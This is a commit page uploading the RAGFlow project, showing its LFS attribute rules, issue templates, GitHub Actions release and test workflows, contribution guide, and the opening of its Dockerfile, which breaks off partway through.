pandaall committed on
Commit ec730cc · verified · 1 parent: 01640cb

Upload 1223 files

This view is limited to 50 files because the commit contains too many changes.
Files changed (50)
  1. .gitattributes +39 -0
  2. ragflow-main/.gitattributes +1 -0
  3. ragflow-main/.github/ISSUE_TEMPLATE/bug_report.yml +67 -0
  4. ragflow-main/.github/ISSUE_TEMPLATE/feature_request.md +10 -0
  5. ragflow-main/.github/ISSUE_TEMPLATE/feature_request.yml +46 -0
  6. ragflow-main/.github/ISSUE_TEMPLATE/question.yml +15 -0
  7. ragflow-main/.github/ISSUE_TEMPLATE/subtask.yml +29 -0
  8. ragflow-main/.github/pull_request_template.md +12 -0
  9. ragflow-main/.github/workflows/release.yml +124 -0
  10. ragflow-main/.github/workflows/tests.yml +137 -0
  11. ragflow-main/.gitignore +40 -0
  12. ragflow-main/CONTRIBUTING.md +48 -0
  13. ragflow-main/Dockerfile +209 -0
  14. ragflow-main/Dockerfile.deps +10 -0
  15. ragflow-main/Dockerfile.scratch.oc9 +60 -0
  16. ragflow-main/LICENSE +201 -0
  17. ragflow-main/README.md +364 -0
  18. ragflow-main/README_id.md +333 -0
  19. ragflow-main/README_ja.md +327 -0
  20. ragflow-main/README_ko.md +327 -0
  21. ragflow-main/README_pt_br.md +354 -0
  22. ragflow-main/README_tzh.md +353 -0
  23. ragflow-main/README_zh.md +352 -0
  24. ragflow-main/SECURITY.md +74 -0
  25. ragflow-main/agent/README.md +45 -0
  26. ragflow-main/agent/README_zh.md +46 -0
  27. ragflow-main/agent/__init__.py +18 -0
  28. ragflow-main/agent/canvas.py +366 -0
  29. ragflow-main/agent/component/__init__.py +133 -0
  30. ragflow-main/agent/component/akshare.py +56 -0
  31. ragflow-main/agent/component/answer.py +89 -0
  32. ragflow-main/agent/component/arxiv.py +68 -0
  33. ragflow-main/agent/component/baidu.py +67 -0
  34. ragflow-main/agent/component/baidufanyi.py +96 -0
  35. ragflow-main/agent/component/base.py +586 -0
  36. ragflow-main/agent/component/begin.py +49 -0
  37. ragflow-main/agent/component/bing.py +84 -0
  38. ragflow-main/agent/component/categorize.py +98 -0
  39. ragflow-main/agent/component/concentrator.py +36 -0
  40. ragflow-main/agent/component/crawler.py +67 -0
  41. ragflow-main/agent/component/deepl.py +61 -0
  42. ragflow-main/agent/component/duckduckgo.py +66 -0
  43. ragflow-main/agent/component/email.py +138 -0
  44. ragflow-main/agent/component/exesql.py +155 -0
  45. ragflow-main/agent/component/generate.py +247 -0
  46. ragflow-main/agent/component/github.py +61 -0
  47. ragflow-main/agent/component/google.py +96 -0
  48. ragflow-main/agent/component/googlescholar.py +70 -0
  49. ragflow-main/agent/component/invoke.py +116 -0
  50. ragflow-main/agent/component/iteration.py +45 -0
.gitattributes CHANGED
@@ -57,3 +57,42 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
57
  # Video files - compressed
58
  *.mp4 filter=lfs diff=lfs merge=lfs -text
59
  *.webm filter=lfs diff=lfs merge=lfs -text
60
+ ragflow-main/web/src/assets/inter/Inter-Black.woff2 filter=lfs diff=lfs merge=lfs -text
61
+ ragflow-main/web/src/assets/inter/Inter-BlackItalic.woff2 filter=lfs diff=lfs merge=lfs -text
62
+ ragflow-main/web/src/assets/inter/Inter-Bold.woff2 filter=lfs diff=lfs merge=lfs -text
63
+ ragflow-main/web/src/assets/inter/Inter-BoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
64
+ ragflow-main/web/src/assets/inter/Inter-ExtraBold.woff2 filter=lfs diff=lfs merge=lfs -text
65
+ ragflow-main/web/src/assets/inter/Inter-ExtraBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
66
+ ragflow-main/web/src/assets/inter/Inter-ExtraLight.woff2 filter=lfs diff=lfs merge=lfs -text
67
+ ragflow-main/web/src/assets/inter/Inter-ExtraLightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
68
+ ragflow-main/web/src/assets/inter/Inter-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
69
+ ragflow-main/web/src/assets/inter/Inter-Light.woff2 filter=lfs diff=lfs merge=lfs -text
70
+ ragflow-main/web/src/assets/inter/Inter-LightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
71
+ ragflow-main/web/src/assets/inter/Inter-Medium.woff2 filter=lfs diff=lfs merge=lfs -text
72
+ ragflow-main/web/src/assets/inter/Inter-MediumItalic.woff2 filter=lfs diff=lfs merge=lfs -text
73
+ ragflow-main/web/src/assets/inter/Inter-Regular.woff2 filter=lfs diff=lfs merge=lfs -text
74
+ ragflow-main/web/src/assets/inter/Inter-SemiBold.woff2 filter=lfs diff=lfs merge=lfs -text
75
+ ragflow-main/web/src/assets/inter/Inter-SemiBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
76
+ ragflow-main/web/src/assets/inter/Inter-Thin.woff2 filter=lfs diff=lfs merge=lfs -text
77
+ ragflow-main/web/src/assets/inter/Inter-ThinItalic.woff2 filter=lfs diff=lfs merge=lfs -text
78
+ ragflow-main/web/src/assets/inter/InterDisplay-Black.woff2 filter=lfs diff=lfs merge=lfs -text
79
+ ragflow-main/web/src/assets/inter/InterDisplay-BlackItalic.woff2 filter=lfs diff=lfs merge=lfs -text
80
+ ragflow-main/web/src/assets/inter/InterDisplay-Bold.woff2 filter=lfs diff=lfs merge=lfs -text
81
+ ragflow-main/web/src/assets/inter/InterDisplay-BoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
82
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraBold.woff2 filter=lfs diff=lfs merge=lfs -text
83
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
84
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraLight.woff2 filter=lfs diff=lfs merge=lfs -text
85
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraLightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
86
+ ragflow-main/web/src/assets/inter/InterDisplay-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
87
+ ragflow-main/web/src/assets/inter/InterDisplay-Light.woff2 filter=lfs diff=lfs merge=lfs -text
88
+ ragflow-main/web/src/assets/inter/InterDisplay-LightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
89
+ ragflow-main/web/src/assets/inter/InterDisplay-Medium.woff2 filter=lfs diff=lfs merge=lfs -text
90
+ ragflow-main/web/src/assets/inter/InterDisplay-MediumItalic.woff2 filter=lfs diff=lfs merge=lfs -text
91
+ ragflow-main/web/src/assets/inter/InterDisplay-Regular.woff2 filter=lfs diff=lfs merge=lfs -text
92
+ ragflow-main/web/src/assets/inter/InterDisplay-SemiBold.woff2 filter=lfs diff=lfs merge=lfs -text
93
+ ragflow-main/web/src/assets/inter/InterDisplay-SemiBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
94
+ ragflow-main/web/src/assets/inter/InterDisplay-Thin.woff2 filter=lfs diff=lfs merge=lfs -text
95
+ ragflow-main/web/src/assets/inter/InterDisplay-ThinItalic.woff2 filter=lfs diff=lfs merge=lfs -text
96
+ ragflow-main/web/src/assets/inter/InterVariable-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
97
+ ragflow-main/web/src/assets/inter/InterVariable.woff2 filter=lfs diff=lfs merge=lfs -text
98
+ ragflow-main/web/src/assets/svg/chunk-method/media-01.svg filter=lfs diff=lfs merge=lfs -text
ragflow-main/.gitattributes ADDED
@@ -0,0 +1 @@
1
+ *.sh text eol=lf
ragflow-main/.github/ISSUE_TEMPLATE/bug_report.yml ADDED
@@ -0,0 +1,67 @@
1
+ name: Bug Report
2
+ description: Create a bug issue for RAGFlow
3
+ title: "[Bug]: "
4
+ labels: [bug]
5
+ body:
6
+ - type: checkboxes
7
+ attributes:
8
+ label: Is there an existing issue for the same bug?
9
+ description: Please check if an issue already exists for the bug you encountered.
10
+ options:
11
+ - label: I have checked the existing issues.
12
+ required: true
13
+ - type: markdown
14
+ attributes:
15
+ value: "Please provide the following information to help us understand the issue."
16
+ - type: input
17
+ attributes:
18
+ label: RAGFlow workspace code commit ID
19
+ description: Enter the commit ID associated with the issue.
20
+ placeholder: e.g., 26d3480e
21
+ validations:
22
+ required: true
23
+ - type: input
24
+ attributes:
25
+ label: RAGFlow image version
26
+ description: Enter the image version (shown in RAGFlow UI, `System` page) associated with the issue.
27
+ placeholder: e.g., 26d3480e(v0.13.0~174)
28
+ validations:
29
+ required: true
30
+ - type: textarea
31
+ attributes:
32
+ label: Other environment information
33
+ description: |
34
+ Enter the environment details:
35
+ value: |
36
+ - Hardware parameters:
37
+ - OS type:
38
+ - Others:
39
+ render: Markdown
40
+ validations:
41
+ required: false
42
+ - type: textarea
43
+ attributes:
44
+ label: Actual behavior
45
+ description: Describe what you encountered.
46
+ validations:
47
+ required: true
48
+ - type: textarea
49
+ attributes:
50
+ label: Expected behavior
51
+ description: Describe what you expected.
52
+ validations:
53
+ required: false
54
+ - type: textarea
55
+ attributes:
56
+ label: Steps to reproduce
57
+ description: Steps to reproduce what you encountered.
58
+ render: Markdown
59
+ validations:
60
+ required: true
61
+ - type: textarea
62
+ attributes:
63
+ label: Additional information
64
+ description: |
65
+ Log, error message, or any other information can help find the root cause.
66
+ validations:
67
+ required: false
ragflow-main/.github/ISSUE_TEMPLATE/feature_request.md ADDED
@@ -0,0 +1,10 @@
1
+ ---
2
+ name: Feature request
3
+ title: '[Feature Request]: '
4
+ about: Suggest an idea for RAGFlow
5
+ labels: ''
6
+ ---
7
+
8
+ **Summary**
9
+
10
+ Description for this feature.
ragflow-main/.github/ISSUE_TEMPLATE/feature_request.yml ADDED
@@ -0,0 +1,46 @@
1
+ name: Feature request
2
+ description: Propose a feature request for RAGFlow.
3
+ title: "[Feature Request]: "
4
+ labels: [feature request]
5
+ body:
6
+ - type: checkboxes
7
+ attributes:
8
+ label: Is there an existing issue for the same feature request?
9
+ description: Please check if an issue already exists for the feature you request.
10
+ options:
11
+ - label: I have checked the existing issues.
12
+ required: true
13
+ - type: textarea
14
+ attributes:
15
+ label: Is your feature request related to a problem?
16
+ description: |
17
+ A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
18
+ render: Markdown
19
+ validations:
20
+ required: false
21
+ - type: textarea
22
+ attributes:
23
+ label: Describe the feature you'd like
24
+ description: A clear and concise description of what you want to happen.
25
+ validations:
26
+ required: true
27
+ - type: textarea
28
+ attributes:
29
+ label: Describe implementation you've considered
30
+ description: A clear and concise description of implementation you've considered or investigated.
31
+ validations:
32
+ required: false
33
+ - type: textarea
34
+ attributes:
35
+ label: Documentation, adoption, use case
36
+ description: If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
37
+ render: Markdown
38
+ validations:
39
+ required: false
40
+ - type: textarea
41
+ attributes:
42
+ label: Additional information
43
+ description: |
44
+ Add any other context or screenshots about the feature request here.
45
+ validations:
46
+ required: false
ragflow-main/.github/ISSUE_TEMPLATE/question.yml ADDED
@@ -0,0 +1,15 @@
1
+ name: Question
2
+ description: Ask questions on RAGFlow
3
+ title: "[Question]: "
4
+ labels: [question]
5
+ body:
6
+ - type: markdown
7
+ attributes:
8
+ value: |
9
+ If the previous templates don't fit what you'd like to report or ask, please use this general question template to file an issue.
10
+ - type: textarea
11
+ attributes:
12
+ label: Describe your problem
13
+ description: A clear and concise description of your problem.
14
+ validations:
15
+ required: true
ragflow-main/.github/ISSUE_TEMPLATE/subtask.yml ADDED
@@ -0,0 +1,29 @@
1
+ name: Subtask
2
+ description: "Propose a subtask for RAGFlow"
3
+ title: "[Subtask]: "
4
+ labels: [subtask]
5
+
6
+ body:
7
+ - type: textarea
8
+ attributes:
9
+ label: Parent Issue
10
+ description: Write the ID of the parent issue
11
+ placeholder: "Parent issue: #"
12
+ validations:
13
+ required: true
14
+
15
+ - type: textarea
16
+ attributes:
17
+ label: Detail of Subtask
18
+ description: |
19
+ Describe the functions that this subtask should implement
20
+ validations:
21
+ required: true
22
+
23
+ - type: textarea
24
+ attributes:
25
+ label: Describe implementation you've considered
26
+ description: A clear and concise description of implementation you've considered or investigated.
27
+ validations:
28
+ required: false
29
+
ragflow-main/.github/pull_request_template.md ADDED
@@ -0,0 +1,12 @@
1
+ ### What problem does this PR solve?
2
+
3
+ _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._
4
+
5
+ ### Type of change
6
+
7
+ - [ ] Bug Fix (non-breaking change which fixes an issue)
8
+ - [ ] New Feature (non-breaking change which adds functionality)
9
+ - [ ] Documentation Update
10
+ - [ ] Refactoring
11
+ - [ ] Performance Improvement
12
+ - [ ] Other (please describe):
ragflow-main/.github/workflows/release.yml ADDED
@@ -0,0 +1,124 @@
1
+ name: release
2
+
3
+ on:
4
+ schedule:
5
+ - cron: '0 13 * * *' # This schedule runs daily at 13:00:00Z (21:00:00+08:00)
6
+ # The "create tags" trigger is specifically focused on the creation of new tags, while the "push tags" trigger is activated when tags are pushed, including both new tag creations and updates to existing tags.
7
+ create:
8
+ tags:
9
+ - "v*.*.*" # normal release
10
+ - "nightly" # the only one mutable tag
11
+
12
+ # https://docs.github.com/en/actions/using-jobs/using-concurrency
13
+ concurrency:
14
+ group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
15
+ cancel-in-progress: true
16
+
17
+ jobs:
18
+ release:
19
+ runs-on: [ "self-hosted", "overseas" ]
20
+ steps:
21
+ - name: Ensure workspace ownership
22
+ run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
23
+
24
+ # https://github.com/actions/checkout/blob/v3/README.md
25
+ - name: Check out code
26
+ uses: actions/checkout@v4
27
+ with:
28
+ token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
29
+ fetch-depth: 0
30
+ fetch-tags: true
31
+
32
+ - name: Prepare release body
33
+ run: |
34
+ if [[ $GITHUB_EVENT_NAME == 'create' ]]; then
35
+ RELEASE_TAG=${GITHUB_REF#refs/tags/}
36
+ if [[ $RELEASE_TAG == 'nightly' ]]; then
37
+ PRERELEASE=true
38
+ else
39
+ PRERELEASE=false
40
+ fi
41
+ echo "Workflow triggered by create tag: $RELEASE_TAG"
42
+ else
43
+ RELEASE_TAG=nightly
44
+ PRERELEASE=true
45
+ echo "Workflow triggered by schedule"
46
+ fi
47
+ echo "RELEASE_TAG=$RELEASE_TAG" >> $GITHUB_ENV
48
+ echo "PRERELEASE=$PRERELEASE" >> $GITHUB_ENV
49
+ RELEASE_DATETIME=$(date --rfc-3339=seconds)
50
+ echo Release $RELEASE_TAG created from $GITHUB_SHA at $RELEASE_DATETIME > release_body.md
51
+
52
+ - name: Move the existing mutable tag
53
+ # https://github.com/softprops/action-gh-release/issues/171
54
+ run: |
55
+ git fetch --tags
56
+ if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
57
+ # Determine if a given tag exists and matches a specific Git commit.
58
+ # actions/checkout@v4 fetch-tags doesn't work when triggered by schedule
59
+ if [ "$(git rev-parse -q --verify "refs/tags/$RELEASE_TAG")" = "$GITHUB_SHA" ]; then
60
+ echo "mutable tag $RELEASE_TAG exists and matches $GITHUB_SHA"
61
+ else
62
+ git tag -f $RELEASE_TAG $GITHUB_SHA
63
+ git push -f origin $RELEASE_TAG:refs/tags/$RELEASE_TAG
64
+ echo "created/moved mutable tag $RELEASE_TAG to $GITHUB_SHA"
65
+ fi
66
+ fi
67
+
68
+ - name: Create or overwrite a release
69
+ # https://github.com/actions/upload-release-asset has been replaced by https://github.com/softprops/action-gh-release
70
+ uses: softprops/action-gh-release@v2
71
+ with:
72
+ token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
73
+ prerelease: ${{ env.PRERELEASE }}
74
+ tag_name: ${{ env.RELEASE_TAG }}
75
+ # The body field does not support environment variable substitution directly.
76
+ body_path: release_body.md
77
+
78
+ - name: Set up QEMU
79
+ uses: docker/setup-qemu-action@v3
80
+
81
+ - name: Set up Docker Buildx
82
+ uses: docker/setup-buildx-action@v3
83
+
84
+ # https://github.com/marketplace/actions/docker-login
85
+ - name: Login to Docker Hub
86
+ uses: docker/login-action@v3
87
+ with:
88
+ username: infiniflow
89
+ password: ${{ secrets.DOCKERHUB_TOKEN }}
90
+
91
+ # https://github.com/marketplace/actions/build-and-push-docker-images
92
+ - name: Build and push full image
93
+ uses: docker/build-push-action@v6
94
+ with:
95
+ context: .
96
+ push: true
97
+ tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}
98
+ file: Dockerfile
99
+ platforms: linux/amd64
100
+
101
+ # https://github.com/marketplace/actions/build-and-push-docker-images
102
+ - name: Build and push slim image
103
+ uses: docker/build-push-action@v6
104
+ with:
105
+ context: .
106
+ push: true
107
+ tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}-slim
108
+ file: Dockerfile
109
+ build-args: LIGHTEN=1
110
+ platforms: linux/amd64
111
+
112
+ - name: Build ragflow-sdk
113
+ if: startsWith(github.ref, 'refs/tags/v')
114
+ run: |
115
+ cd sdk/python && \
116
+ uv build
117
+
118
+ - name: Publish package distributions to PyPI
119
+ if: startsWith(github.ref, 'refs/tags/v')
120
+ uses: pypa/gh-action-pypi-publish@release/v1
121
+ with:
122
+ packages-dir: sdk/python/dist/
123
+ password: ${{ secrets.PYPI_API_TOKEN }}
124
+ verbose: true
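
Given the `create` trigger on `v*.*.*` tags above, a normal (non-nightly) release is cut by tagging a commit and pushing that tag. A minimal sketch (the tag name is illustrative):

```bash
# Tag the commit to release and push the tag; the workflow above then
# creates the GitHub release and builds/pushes the Docker images.
git tag v0.16.0
git push origin v0.16.0
```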
ragflow-main/.github/workflows/tests.yml ADDED
@@ -0,0 +1,137 @@
1
+ name: tests
2
+
3
+ on:
4
+ push:
5
+ branches:
6
+ - 'main'
7
+ - '*.*.*'
8
+ paths-ignore:
9
+ - 'docs/**'
10
+ - '*.md'
11
+ - '*.mdx'
12
+ pull_request:
13
+ types: [ opened, synchronize, reopened, labeled ]
14
+ paths-ignore:
15
+ - 'docs/**'
16
+ - '*.md'
17
+ - '*.mdx'
18
+
19
+ # https://docs.github.com/en/actions/using-jobs/using-concurrency
20
+ concurrency:
21
+ group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
22
+ cancel-in-progress: true
23
+
24
+ jobs:
25
+ ragflow_tests:
26
+ name: ragflow_tests
27
+ # https://docs.github.com/en/actions/using-jobs/using-conditions-to-control-job-execution
28
+ # https://github.com/orgs/community/discussions/26261
29
+ if: ${{ github.event_name != 'pull_request' || contains(github.event.pull_request.labels.*.name, 'ci') }}
30
+ runs-on: [ "self-hosted", "debug" ]
31
+ steps:
32
+ # https://github.com/hmarr/debug-action
33
+ #- uses: hmarr/debug-action@v2
34
+
35
+ - name: Show PR labels
36
+ run: |
37
+ echo "Workflow triggered by ${{ github.event_name }}"
38
+ if [[ ${{ github.event_name }} == 'pull_request' ]]; then
39
+ echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
40
+ fi
41
+
42
+ - name: Ensure workspace ownership
43
+ run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
44
+
45
+ # https://github.com/actions/checkout/issues/1781
46
+ - name: Check out code
47
+ uses: actions/checkout@v4
48
+ with:
49
+ fetch-depth: 0
50
+ fetch-tags: true
51
+
52
+ # https://github.com/astral-sh/ruff-action
53
+ - name: Static check with Ruff
54
+ uses: astral-sh/ruff-action@v2
55
+ with:
56
+ version: ">=0.8.2"
57
+ args: "check --ignore E402"
58
+
59
+ - name: Build ragflow:nightly-slim
60
+ run: |
61
+ RUNNER_WORKSPACE_PREFIX=${RUNNER_WORKSPACE_PREFIX:-$HOME}
62
+ sudo docker pull ubuntu:22.04
63
+ sudo docker build --progress=plain --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
64
+
65
+ - name: Build ragflow:nightly
66
+ run: |
67
+ sudo docker build --progress=plain --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
68
+
69
+ - name: Start ragflow:nightly-slim
70
+ run: |
71
+ echo "RAGFLOW_IMAGE=infiniflow/ragflow:nightly-slim" >> docker/.env
72
+ sudo docker compose -f docker/docker-compose.yml up -d
73
+
74
+ - name: Stop ragflow:nightly-slim
75
+ if: always() # always run this step even if previous steps failed
76
+ run: |
77
+ sudo docker compose -f docker/docker-compose.yml down -v
78
+
79
+ - name: Start ragflow:nightly
80
+ run: |
81
+ echo "RAGFLOW_IMAGE=infiniflow/ragflow:nightly" >> docker/.env
82
+ sudo docker compose -f docker/docker-compose.yml up -d
83
+
84
+ - name: Run sdk tests against Elasticsearch
85
+ run: |
86
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
87
+ export HOST_ADDRESS=http://host.docker.internal:9380
88
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
89
+ echo "Waiting for service to be available..."
90
+ sleep 5
91
+ done
92
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_sdk_api && pytest -s --tb=short get_email.py t_dataset.py t_chat.py t_session.py t_document.py t_chunk.py
93
+
94
+ - name: Run frontend api tests against Elasticsearch
95
+ run: |
96
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
97
+ export HOST_ADDRESS=http://host.docker.internal:9380
98
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
99
+ echo "Waiting for service to be available..."
100
+ sleep 5
101
+ done
102
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
103
+
104
+
105
+ - name: Stop ragflow:nightly
106
+ if: always() # always run this step even if previous steps failed
107
+ run: |
108
+ sudo docker compose -f docker/docker-compose.yml down -v
109
+
110
+ - name: Start ragflow:nightly
111
+ run: |
112
+ sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml up -d
113
+
114
+ - name: Run sdk tests against Infinity
115
+ run: |
116
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
117
+ export HOST_ADDRESS=http://host.docker.internal:9380
118
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
119
+ echo "Waiting for service to be available..."
120
+ sleep 5
121
+ done
122
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_sdk_api && pytest -s --tb=short get_email.py t_dataset.py t_chat.py t_session.py t_document.py t_chunk.py
123
+
124
+ - name: Run frontend api tests against Infinity
125
+ run: |
126
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
127
+ export HOST_ADDRESS=http://host.docker.internal:9380
128
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
129
+ echo "Waiting for service to be available..."
130
+ sleep 5
131
+ done
132
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
133
+
134
+ - name: Stop ragflow:nightly
135
+ if: always() # always run this step even if previous steps failed
136
+ run: |
137
+ sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v
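
Note that, per the `if:` condition above, this workflow runs on pull requests only when they carry the `ci` label. One way to add that label is via the GitHub CLI (a sketch; `gh` is not part of this repository's tooling, and the PR number is a placeholder):

```bash
# Label a pull request so ragflow_tests runs on it
gh pr edit <PR_NUMBER> --add-label ci
```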
ragflow-main/.gitignore ADDED
@@ -0,0 +1,40 @@
1
+ # Generated by Cargo
2
+ # will have compiled files and executables
3
+ debug/
4
+ target/
5
+ __pycache__/
6
+ hudet/
7
+ cv/
8
+ layout_app.py
9
+ api/flask_session
10
+
11
+ # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries
12
+ # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html
13
+ Cargo.lock
14
+
15
+ # These are backup files generated by rustfmt
16
+ **/*.rs.bk
17
+
18
+ # MSVC Windows builds of rustc generate these, which store debugging information
19
+ *.pdb
20
+ *.trie
21
+
22
+ .idea/
23
+ .vscode/
24
+
25
+ # Exclude Mac generated files
26
+ .DS_Store
27
+
28
+ # Exclude the log folder
29
+ docker/ragflow-logs/
30
+ /flask_session
31
+ /logs
32
+ rag/res/deepdoc
33
+
34
+ # Exclude sdk generated files
35
+ sdk/python/ragflow.egg-info/
36
+ sdk/python/build/
37
+ sdk/python/dist/
38
+ sdk/python/ragflow_sdk.egg-info/
39
+ huggingface.co/
40
+ nltk_data/
ragflow-main/CONTRIBUTING.md ADDED
@@ -0,0 +1,48 @@
1
+ # Contribution guidelines
2
+
3
+ This document offers guidelines and major considerations for submitting your contributions to RAGFlow.
4
+
5
+ - To report a bug, file a [GitHub issue](https://github.com/infiniflow/ragflow/issues/new/choose) with us.
6
+ - For further questions, you can explore existing discussions or initiate a new one in [Discussions](https://github.com/orgs/infiniflow/discussions).
7
+
8
+ ## What you can contribute
9
+
10
+ The list below mentions some contributions you can make, but it is not a complete list.
11
+
12
+ - Proposing or implementing new features
13
+ - Fixing a bug
14
+ - Adding test cases or demos
15
+ - Posting a blog or tutorial
16
+ - Updating existing documents, code, or annotations
17
+ - Suggesting more user-friendly error codes
18
+
19
+ ## File a pull request (PR)
20
+
21
+ ### General workflow
22
+
23
+ 1. Fork our GitHub repository.
24
+ 2. Clone your fork to your local machine:
25
+ `git clone git@github.com:<yourname>/ragflow.git`
26
+ 3. Create a local branch:
27
+ `git checkout -b my-branch`
28
+ 4. Commit changes to your local branch with a sufficiently informative commit message:
29
+ `git commit -m 'Provide sufficient info in your commit message'`
30
+ 5. Push your branch to GitHub:
31
+ `git push origin my-branch`
32
+ 6. Submit a pull request for review.
33
+
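
Taken together, a minimal sketch of the workflow above (the fork URL and branch name are placeholders):

```bash
git clone git@github.com:<yourname>/ragflow.git
cd ragflow
git checkout -b my-branch
# ... make your changes ...
git commit -m 'Provide sufficient info in your commit message'
git push origin my-branch
# then open a pull request on GitHub for review
```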
34
+ ### Before filing a PR
35
+
36
+ - Consider splitting a large PR into multiple smaller, standalone PRs to keep a traceable development history.
37
+ - Ensure that your PR addresses just one issue, or keep any unrelated changes small.
38
+ - Add test cases when contributing new features. They demonstrate that your code functions correctly and protect against potential issues from future changes.
39
+
40
+ ### Describing your PR
41
+
42
+ - Ensure that your PR title is concise and clear, providing all the required information.
43
+ - Refer to a corresponding GitHub issue in your PR description if applicable.
44
+ - Include sufficient design details for *breaking changes* or *API changes* in your description.
45
+
46
+ ### Reviewing & merging a PR
47
+
48
+ Ensure that your PR passes all Continuous Integration (CI) tests before merging it.
ragflow-main/Dockerfile ADDED
@@ -0,0 +1,209 @@
1
+ # base stage
2
+ FROM ubuntu:22.04 AS base
3
+ USER root
4
+ SHELL ["/bin/bash", "-c"]
5
+
6
+ ARG NEED_MIRROR=0
7
+ ARG LIGHTEN=0
8
+ ENV LIGHTEN=${LIGHTEN}
9
+
10
+ WORKDIR /ragflow
11
+
12
+ # Copy models downloaded via download_deps.py
13
+ RUN mkdir -p /ragflow/rag/res/deepdoc /root/.ragflow
14
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
15
+ cp /huggingface.co/InfiniFlow/huqie/huqie.txt.trie /ragflow/rag/res/ && \
16
+ tar --exclude='.*' -cf - \
17
+ /huggingface.co/InfiniFlow/text_concat_xgb_v1.0 \
18
+ /huggingface.co/InfiniFlow/deepdoc \
19
+ | tar -xf - --strip-components=3 -C /ragflow/rag/res/deepdoc
20
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
21
+ if [ "$LIGHTEN" != "1" ]; then \
22
+ (tar -cf - \
23
+ /huggingface.co/BAAI/bge-large-zh-v1.5 \
24
+ /huggingface.co/BAAI/bge-reranker-v2-m3 \
25
+ /huggingface.co/maidalun1020/bce-embedding-base_v1 \
26
+ /huggingface.co/maidalun1020/bce-reranker-base_v1 \
27
+ | tar -xf - --strip-components=2 -C /root/.ragflow) \
28
+ fi
29
+
30
+ # https://github.com/chrismattmann/tika-python
31
+ # This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
32
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
33
+ cp -r /deps/nltk_data /root/ && \
34
+ cp /deps/tika-server-standard-3.0.0.jar /deps/tika-server-standard-3.0.0.jar.md5 /ragflow/ && \
35
+ cp /deps/cl100k_base.tiktoken /ragflow/9b5ad71b2ce5302211f9c61530b329a4922fc6a4
36
+
37
+ ENV TIKA_SERVER_JAR="file:///ragflow/tika-server-standard-3.0.0.jar"
38
+ ENV DEBIAN_FRONTEND=noninteractive
39
+
40
+ # Setup apt
41
+ # Python package and implicit dependencies:
42
+ # opencv-python: libglib2.0-0 libglx-mesa0 libgl1
43
+ # aspose-slides: pkg-config libicu-dev libgdiplus libssl1.1_1.1.1f-1ubuntu2_amd64.deb
44
+ # python-pptx: default-jdk tika-server-standard-3.0.0.jar
45
+ # selenium: libatk-bridge2.0-0 chrome-linux64-121-0-6167-85
46
